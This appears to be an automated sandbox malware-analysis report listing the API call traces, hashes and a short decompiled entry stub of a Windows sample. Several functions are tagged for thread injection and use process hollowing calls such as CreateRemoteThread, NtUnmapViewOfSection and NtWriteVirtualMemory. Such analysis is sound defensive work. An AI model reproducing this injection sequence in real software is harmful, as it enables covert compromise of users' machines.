Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E3C8B, Relevance: 4.6, APIs: 3, Instructions: 53 Total matches: 12

Similarity

Total matches: 12
API ID: GetModuleFileName$GetLastError
String ID:
API String ID: 3709004705-0
Opcode ID: d4f5095c8902255d58a9495724da3ecc245ace53255d050a18a8176b02be640e
Instruction ID: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
Opcode Fuzzy Hash: 22D02B840B9C0AC30C4360859068B1563D10F11185B8879835744B07BF3F1130DFE75D
Instruction Fuzzy Hash: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: foaqDTP.exe Analysis ID: 60981

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:	35
Initial Analysis Report:	Open
